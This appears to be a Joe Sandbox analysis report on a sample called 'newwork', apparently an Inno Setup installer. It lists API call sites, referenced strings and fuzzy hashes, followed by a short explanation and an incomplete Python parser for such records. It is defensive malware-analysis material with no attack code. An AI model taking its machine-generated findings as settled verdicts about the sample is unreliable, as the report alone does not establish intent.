                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: Class$InfoLongRegisterUnregisterWindow
                                                                                        • String ID:
                                                                                        • API String ID: 4025006896-0
                                                                                        • Opcode ID: 2789f09181fedf2aa8f29be774d1bfe7920984f559ea6f8e8637ed1726722249
                                                                                        • Instruction ID: 7a0dc659497f48f9aad4428a0df7724adcaf244520b53866b591a9b3b5545ee4
                                                                                        • Opcode Fuzzy Hash: 2789f09181fedf2aa8f29be774d1bfe7920984f559ea6f8e8637ed1726722249
                                                                                        • Instruction Fuzzy Hash: F6011B72240104AADA10EBACED81E9B33999729314B11423BB615E72A2D6399C558BAC
                                                                                        APIs
                                                                                        • WaitForInputIdle.USER32(?,00000032), ref: 00454FA8
                                                                                        • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00454FCA
                                                                                        • GetExitCodeProcess.KERNEL32(?,?), ref: 00454FD9
                                                                                        • CloseHandle.KERNEL32(?,00455006,00454FFF,?,?,?,00000000,?,?,004551DB,?,?,?,00000044,00000000,00000000), ref: 00454FF9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: Wait$CloseCodeExitHandleIdleInputMultipleObjectsProcess
                                                                                        • String ID:
                                                                                        • API String ID: 4071923889-0
                                                                                        • Opcode ID: 8aa0dd6ec5a68f6f7641eb82506f7728cd0b20fc7582fe19e2ee2bc87ac6724f
                                                                                        • Instruction ID: ea90b2abd28d60bbe0c33bbe6d7a83e36ef454db8471bda6b5c19e9a906557d9
                                                                                        • Opcode Fuzzy Hash: 8aa0dd6ec5a68f6f7641eb82506f7728cd0b20fc7582fe19e2ee2bc87ac6724f
                                                                                        • Instruction Fuzzy Hash: B9012D31A006097FEB1097AA8C02F6FBBECDF49764F610127F904D72C2C5788D409A78
                                                                                        APIs
                                                                                        • FindResourceA.KERNEL32(00400000,?,00000000), ref: 0040D027
                                                                                        • LoadResource.KERNEL32(00400000,72756F73,0040A7C8,00400000,00000001,00000000,?,0040CF84,00000000,?,00000000,?,?,0047CB58,0000000A,00000000), ref: 0040D041
                                                                                        • SizeofResource.KERNEL32(00400000,72756F73,00400000,72756F73,0040A7C8,00400000,00000001,00000000,?,0040CF84,00000000,?,00000000,?,?,0047CB58), ref: 0040D05B
                                                                                        • LockResource.KERNEL32(74536563,00000000,00400000,72756F73,00400000,72756F73,0040A7C8,00400000,00000001,00000000,?,0040CF84,00000000,?,00000000,?), ref: 0040D065
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: Resource$FindLoadLockSizeof
                                                                                        • String ID:
                                                                                        • API String ID: 3473537107-0
                                                                                        • Opcode ID: f701ce4f04cb0ebdd1143b5585c75acb70ffd029a82b31343d3be87257736b7b
                                                                                        • Instruction ID: ce77ce8360aa458f47a01e9b0563465317cd85cc21d7bcd45488e041df035c61
                                                                                        • Opcode Fuzzy Hash: f701ce4f04cb0ebdd1143b5585c75acb70ffd029a82b31343d3be87257736b7b
                                                                                        • Instruction Fuzzy Hash: 49F04F726056046F9B14EE59A881D5B77ECDE88268310013AF908E7286DA38DD018B68
                                                                                        APIs
                                                                                        • GetLastError.KERNEL32(?,00000000), ref: 004705F1
                                                                                        Strings
                                                                                        • Failed to set NTFS compression state (%d)., xrefs: 00470602
                                                                                        • Unsetting NTFS compression on file: %s, xrefs: 004705D7
                                                                                        • Setting NTFS compression on file: %s, xrefs: 004705BF
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLast
                                                                                        • String ID: Failed to set NTFS compression state (%d).$Setting NTFS compression on file: %s$Unsetting NTFS compression on file: %s
                                                                                        • API String ID: 1452528299-3038984924
                                                                                        • Opcode ID: 4a85a403c5f553919e8eb8264edf58c674aea38054a880eb2495f4adb197a451
                                                                                        • Instruction ID: 452327faed6fd823952186a677ff1a78a18aba12ee86070aec797b5412e08bdc
                                                                                        • Opcode Fuzzy Hash: 4a85a403c5f553919e8eb8264edf58c674aea38054a880eb2495f4adb197a451
                                                                                        • Instruction Fuzzy Hash: A5018B71D09248A6CB04D7AD94512DDBBE49F4D314F44C5FFE459D7342DB780A088B9E
                                                                                        APIs
                                                                                        • GetLastError.KERNEL32(00000000,00000000), ref: 0046FE45
                                                                                        Strings
                                                                                        • Unsetting NTFS compression on directory: %s, xrefs: 0046FE2B
                                                                                        • Failed to set NTFS compression state (%d)., xrefs: 0046FE56
                                                                                        • Setting NTFS compression on directory: %s, xrefs: 0046FE13
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLast
                                                                                        • String ID: Failed to set NTFS compression state (%d).$Setting NTFS compression on directory: %s$Unsetting NTFS compression on directory: %s
                                                                                        • API String ID: 1452528299-1392080489
                                                                                        • Opcode ID: 01501a136b81c39b7c411191948b84cc59583678e1d21d505a98b8108a1a9e37
                                                                                        • Instruction ID: 6c3eba688a3488f6cff2036d9eec8e6f632fba0cce39d579df3f4bd3b957a0ce
                                                                                        • Opcode Fuzzy Hash: 01501a136b81c39b7c411191948b84cc59583678e1d21d505a98b8108a1a9e37
                                                                                        • Instruction Fuzzy Hash: E5014421E0824856CB04D7ADE44129DBBA49F49304F4485BBA495E7253EB790A09879B
APIs
  • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
• RegDeleteValueA.ADVAPI32(?,00000000,00000082,00000002,00000000,?,?,00000000,0045B7AE,?,?,?,?,?,00000000,0045B7D5), ref: 00455DD8
• RegCloseKey.ADVAPI32(00000000,?,00000000,00000082,00000002,00000000,?,?,00000000,0045B7AE,?,?,?,?,?,00000000), ref: 00455DE1
• RemoveFontResourceA.GDI32(00000000), ref: 00455DEE
• SendNotifyMessageA.USER32(0000FFFF,0000001D,00000000,00000000), ref: 00455E02
Memory Dump Source
• Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_newwork.jbxd
Similarity
• API ID: CloseDeleteFontMessageNotifyOpenRemoveResourceSendValue
• String ID:
• API String ID: 4283692357-0
APIs
Similarity
• API ID: ErrorLast$CountSleepTick
• String ID:
• API String ID: 2227064392-0
APIs
• GetCurrentProcess.KERNEL32(00000008,?,?,?,00000001,00000000,00000002,00000000,004812C8,?,?,?,?,?,00498CDB,00000000), ref: 0047820D
• OpenProcessToken.ADVAPI32(00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,004812C8,?,?,?,?,?,00498CDB), ref: 00478213
• GetTokenInformation.ADVAPI32(00000008,00000012(TokenIntegrityLevel),00000000,00000004,00000008,00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,004812C8), ref: 00478235
• CloseHandle.KERNEL32(00000000,00000008,TokenIntegrityLevel,00000000,00000004,00000008,00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,004812C8), ref: 00478246
Similarity
• API ID: ProcessToken$CloseCurrentHandleInformationOpen
• String ID:
• API String ID: 215268677-0
APIs
• GetLastActivePopup.USER32(?), ref: 0042424C
• IsWindowVisible.USER32(?), ref: 0042425D
• IsWindowEnabled.USER32(?), ref: 00424267
• SetForegroundWindow.USER32(?), ref: 00424271
Similarity
• API ID: Window$ActiveEnabledForegroundLastPopupVisible
• String ID:
• API String ID: 2280970139-0
APIs
• GlobalHandle.KERNEL32 ref: 0040626F
• GlobalUnlock.KERNEL32(00000000), ref: 00406276
• GlobalReAlloc.KERNEL32(00000000,00000000), ref: 0040627B
• GlobalLock.KERNEL32(00000000), ref: 00406281
Similarity
• API ID: Global$AllocHandleLockUnlock
• String ID:
• API String ID: 2167344118-0
APIs
• RegCloseKey.ADVAPI32(?,?,?,?,00000001,00000000,00000000,0047BB01,?,00000000,00000000,00000001,00000000,0047A4B5,?,00000000), ref: 0047A479
Strings
• Failed to parse "reg" constant, xrefs: 0047A480
• Cannot access a 64-bit key in a "reg" constant on this version of Windows, xrefs: 0047A2ED
Similarity
• API ID: Close
• String ID: Cannot access a 64-bit key in a "reg" constant on this version of Windows$Failed to parse "reg" constant
• API String ID: 3535843008-1938159461
APIs
• GetForegroundWindow.USER32(00000000,00483716,?,00000000,00483757,?,?,?,?,00000000,00000000,00000000,?,0046BD99), ref: 004835C5
• SetActiveWindow.USER32(?,00000000,00483716,?,00000000,00483757,?,?,?,?,00000000,00000000,00000000,?,0046BD99), ref: 004835D7
Strings
• Will not restart Windows automatically., xrefs: 004836F6
Similarity
• API ID: Window$ActiveForeground
• String ID: Will not restart Windows automatically.
• API String ID: 307657957-4169339592
APIs
• LocalFileTimeToFileTime.KERNEL32(?,?,?,00000000,00000000,004764DF,?,00000000,004764F0,?,00000000,00476539), ref: 004764B0
• SetFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,00000000,00000000,004764DF,?,00000000,004764F0,?,00000000,00476539), ref: 004764C4
Strings
• Extracting temporary file: , xrefs: 004763EC
Similarity
• API ID: FileTime$Local
• String ID: Extracting temporary file:
• API String ID: 791338737-4171118009
Strings
• Failed to proceed to next wizard page; showing wizard., xrefs: 0046CD38
• Failed to proceed to next wizard page; aborting., xrefs: 0046CD24
Similarity
• API ID:
• String ID: Failed to proceed to next wizard page; aborting.$Failed to proceed to next wizard page; showing wizard.
• API String ID: 0-1974262853
APIs
  • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
• RegCloseKey.ADVAPI32(?,00478F7E,?,?,00000001,00000000,00000000,00478F99), ref: 00478F67
Strings
• %s\%s_is1, xrefs: 00478F10
• Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00478EF2
                                                                                        Similarity
                                                                                        • API ID: CloseOpen
                                                                                        • String ID: %s\%s_is1$Software\Microsoft\Windows\CurrentVersion\Uninstall
                                                                                        • API String ID: 47109696-1598650737
                                                                                        • Opcode ID: 4390143081fa1cbfc05a77ab89ffad6b83c856e6c2d55465ffb8b64579313e9f
                                                                                        • Instruction ID: 4b2a563bf9abf46f4fe3d7c32e0d4fce195dfbf5fea183d3e913b06dd9c9918d
                                                                                        • Opcode Fuzzy Hash: 4390143081fa1cbfc05a77ab89ffad6b83c856e6c2d55465ffb8b64579313e9f
                                                                                        • Instruction Fuzzy Hash: EC218070B44244AFDB11DBA9CC45A9EBBF9EB8D704F90847BE408E7381DB789D018B58
                                                                                        APIs
                                                                                        • SendMessageA.USER32(00000000,0000044B,00000000,?), ref: 004501FD
                                                                                        • ShellExecuteA.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 0045022E
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: ExecuteMessageSendShell
                                                                                        • String ID: open
                                                                                        • API String ID: 812272486-2758837156
                                                                                        • Opcode ID: ea446b968c091deb5619fe0c64f284e9fafe3e6cb185d1fb8701354efc215884
                                                                                        • Instruction ID: 7f57506e0c07b49dd0b520b237e7736b759e9f4ed638734fb0c833ac5abbff07
                                                                                        • Opcode Fuzzy Hash: ea446b968c091deb5619fe0c64f284e9fafe3e6cb185d1fb8701354efc215884
                                                                                        • Instruction Fuzzy Hash: A1216074E00204AFDB10DFA9C896B9EBBF8EB44705F1081BAB404E7292D678DE45CA59
                                                                                        APIs
                                                                                        • ShellExecuteEx.SHELL32(0000003C), ref: 0045532C
                                                                                        • GetLastError.KERNEL32(0000003C,00000000,00455375,?,?,?), ref: 0045533D
                                                                                          • Part of subcall function 0042D8C4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8D7
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: DirectoryErrorExecuteLastShellSystem
                                                                                        • String ID: <
                                                                                        • API String ID: 893404051-4251816714
                                                                                        • Opcode ID: be62181711fdad770c23067a055a605ead6c89444dc6de91f0ff3b7559ccb240
                                                                                        • Instruction ID: 92df0b2f1231c5c49ece4c570041ef31d6ed92e86db86b93cafb864a5026e18c
                                                                                        • Opcode Fuzzy Hash: be62181711fdad770c23067a055a605ead6c89444dc6de91f0ff3b7559ccb240
                                                                                        • Instruction Fuzzy Hash: 172167B0600609ABDB10EF65C8926AE7BE8AF44355F54403AFC44E7291D7789E49CB98
                                                                                        APIs
                                                                                        • RtlEnterCriticalSection.KERNEL32(0049B420,00000000,)), ref: 004025C7
                                                                                        • RtlLeaveCriticalSection.KERNEL32(0049B420,0040263D), ref: 00402630
                                                                                          • Part of subcall function 004019CC: RtlInitializeCriticalSection.KERNEL32(0049B420,00000000,00401A82,?,?,0040222E,0220C2BC,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
                                                                                          • Part of subcall function 004019CC: RtlEnterCriticalSection.KERNEL32(0049B420,0049B420,00000000,00401A82,?,?,0040222E,0220C2BC,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
                                                                                          • Part of subcall function 004019CC: LocalAlloc.KERNEL32(00000000,00000FF8,0049B420,00000000,00401A82,?,?,0040222E,0220C2BC,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
                                                                                          • Part of subcall function 004019CC: RtlLeaveCriticalSection.KERNEL32(0049B420,00401A89,00000000,00401A82,?,?,0040222E,0220C2BC,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: CriticalSection$EnterLeave$AllocInitializeLocal
                                                                                        • String ID: )
                                                                                        • API String ID: 2227675388-1084416617
                                                                                        • Opcode ID: e007287126da8fa7f668c9e0dd370e3762efe765c6f58c3167b97aa7cf6c64ab
                                                                                        • Instruction ID: 77bd95ba853a3ee3b707a504883d316aad751082ca23ba06a0d8aa2ba3da16af
                                                                                        • Opcode Fuzzy Hash: e007287126da8fa7f668c9e0dd370e3762efe765c6f58c3167b97aa7cf6c64ab
                                                                                        • Instruction Fuzzy Hash: E11104317042046FEB15AB796F5962B6AD4D795758B24087FF404F33D2DABD8C02929C
                                                                                        APIs
                                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097), ref: 00496B69
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window
                                                                                        • String ID: /INITPROCWND=$%x $@
                                                                                        • API String ID: 2353593579-4169826103
                                                                                        • Opcode ID: 065ab22c92abacbd348a857e8389b224364e1a84b4d72130b6d36c29b0d142f9
                                                                                        • Instruction ID: 88b10d18150c6b9811cea3f3864e76c9cf3cbfb68c265b437af87b1fefc14b87
                                                                                        • Opcode Fuzzy Hash: 065ab22c92abacbd348a857e8389b224364e1a84b4d72130b6d36c29b0d142f9
                                                                                        • Instruction Fuzzy Hash: A3117231A042489FDF01DBA4E855BAEBFE8EB49314F51847BE504E7292EB3CA905C658
                                                                                        APIs
                                                                                          • Part of subcall function 00403CA4: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                                                          • Part of subcall function 00403CA4: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                                                        • SysFreeString.OLEAUT32(?), ref: 004474C6
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: String$AllocByteCharFreeMultiWide
                                                                                        • String ID: NIL Interface Exception$Unknown Method
                                                                                        • API String ID: 3952431833-1023667238
                                                                                        • Opcode ID: eaaa5532a95bbaa63f0b72a9291e33775e11d622c6162567185e6fee38e986d8
                                                                                        • Instruction ID: eb0132878ffe7144b3db707554455947565e11d0cdd4dc78092451a8fec87e99
                                                                                        • Opcode Fuzzy Hash: eaaa5532a95bbaa63f0b72a9291e33775e11d622c6162567185e6fee38e986d8
                                                                                        • Instruction Fuzzy Hash: 8011B9706082089FEB10DFA58C52A6EBBBCEB09704F91407AF504F7681D77C9D01CB69
                                                                                        APIs
                                                                                        • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,000000FC,?,00496468,?,0049645C,00000000,00496443), ref: 0049640E
                                                                                        • CloseHandle.KERNEL32(004964A8,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,000000FC,?,00496468,?,0049645C,00000000), ref: 00496425
                                                                                          • Part of subcall function 004962F8: GetLastError.KERNEL32(00000000,00496390,?,?,?,?), ref: 0049631C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseCreateErrorHandleLastProcess
                                                                                        • String ID: 0nI
                                                                                        • API String ID: 3798668922-794067871
                                                                                        • Opcode ID: 9f8f3e3bd8d813766f30c87d8e8bb38219208be6823d56de1360ae23e0f090d4
                                                                                        • Instruction ID: 4379268ebcebee96409867e54b2437a6ba0b21f89d1dc4ba20584320bf55fb87
                                                                                        • Opcode Fuzzy Hash: 9f8f3e3bd8d813766f30c87d8e8bb38219208be6823d56de1360ae23e0f090d4
                                                                                        • Instruction Fuzzy Hash: 840182B1644248AFDB00EBD1DC42A9EBBACDF08704F51403AB904E7281D6785E008A2D
                                                                                        APIs
                                                                                        • RegQueryValueExA.ADVAPI32(?,Inno Setup: No Icons,00000000,00000000,00000000,00000000), ref: 0042DD78
                                                                                        • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,Inno Setup: No Icons,00000000,00000000,00000000), ref: 0042DDB8
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: Value$EnumQuery
                                                                                        • String ID: Inno Setup: No Icons
                                                                                        • API String ID: 1576479698-2016326496
                                                                                        • Opcode ID: 36a0b08f46d91d09f38f531e186592c2a543f82488f0210131226a48688c00be
                                                                                        • Instruction ID: 8d080c6700cf8453afd411d185ff7d2dd707f59376968ad674d2e7d16536e1ed
                                                                                        • Opcode Fuzzy Hash: 36a0b08f46d91d09f38f531e186592c2a543f82488f0210131226a48688c00be
                                                                                        • Instruction Fuzzy Hash: 1B012B33B55B7179FB3045256D01F7B57889B82B60F64013BF942EA2C0D6999C04936E
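                                                                                         The function records in this report are plain text: an "APIs" block of resolved calls with their call-site addresses, a "Strings" block with cross-references, and a "Similarity" block of hashes. Two of the records above are worth pulling out together: the lookup of `%s\%s_is1` under `Software\Microsoft\Windows\CurrentVersion\Uninstall` and the query of the `Inno Setup: No Icons` value are the uninstall-key conventions used by Inno Setup installers, and the `CreateProcessA`/`ShellExecuteA`/`ShellExecuteEx` records are the places where the stub hands off execution. The parser below is an added example written for this page; it is not Joe Sandbox code and not code recovered from the sample. It turns such records into structured objects and tags the ones that read installer uninstall keys or spawn processes. The record text embedded in it is constructed from two of the entries shown here, cut down to the fields the parser reads; the tag names, the `PROCESS_LAUNCH_APIS` list and the `_is1` suffix check are the editor's own choices, not something the report states.

```python
"""Parse Joe Sandbox per-function records ("APIs" / "Strings" / "Similarity"
blocks) into structured objects and flag security-relevant ones.

Added example for this page; not Joe Sandbox code and not code from the sample.
SAMPLE_RECORDS is constructed from two records of the report, trimmed to the
fields the parser consumes.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Set, Tuple

SAMPLE_RECORDS = r"""
APIs
  • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
• RegCloseKey.ADVAPI32(?,00478F7E,?,?,00000001,00000000,00000000,00478F99), ref: 00478F67
Strings
• %s\%s_is1, xrefs: 00478F10
• Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00478EF2
Memory Dump Source
• Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: CloseOpen
• String ID: %s\%s_is1$Software\Microsoft\Windows\CurrentVersion\Uninstall
• API String ID: 47109696-1598650737
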